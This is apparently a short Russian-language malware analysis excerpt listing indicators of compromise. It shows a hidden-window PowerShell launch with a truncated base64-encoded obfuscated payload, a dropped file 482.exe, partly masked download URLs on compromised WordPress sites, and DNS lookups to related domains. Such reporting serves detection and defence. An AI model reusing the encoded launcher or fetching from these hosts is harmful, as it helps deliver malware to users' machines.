Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAATAB5AGoAaQBjAGQAcgBnAHkAcwBtAGcAdQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBWAGIAbgBiAGwAawB5AG0AbgBvAHgAIAAjAD4AIAAkAFcAcgB0AGIAeABzAHQAcQBtAHcAPQ...
- %HOMEPATH%\482.exe
- %HOMEPATH%\482.exe
- %HOMEPATH%\482.exe
- http://fo####ydelivery.com/all-backup/wp-admin/7lq0/
- http://bl##.###covermichigan.com/wp-includes/evg95100/
- DNS ASK fo####ydelivery.com
- DNS ASK er####rinsaat.net
- DNS ASK bl##.###covermichigan.com
- DNS ASK pr##kat.net
- DNS ASK gy##tak.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAATAB5AGoAaQBjAGQAcgBnAHkAcwBtAGcAdQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBWAGIAbgBiAGwAawB5AG0AbgBvAHgAIAAjAD4AIAAkAFcAcgB0AGIAeABzAHQAcQBtAHcAPQ...' (со скрытым окном)